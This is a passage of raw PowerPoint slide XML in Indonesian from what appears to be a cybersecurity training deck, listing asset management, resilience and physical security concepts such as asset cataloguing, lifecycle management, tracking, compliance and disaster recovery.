              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>permanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (fix) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>retractable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinaikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diturunkan</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171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334383536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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pedoman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Aset dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> asset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwujud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mencantumkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siklus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> asset </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pensiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> asset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sanksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesinambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemusnahan</a:t>
            </a:r>
            <a:r>
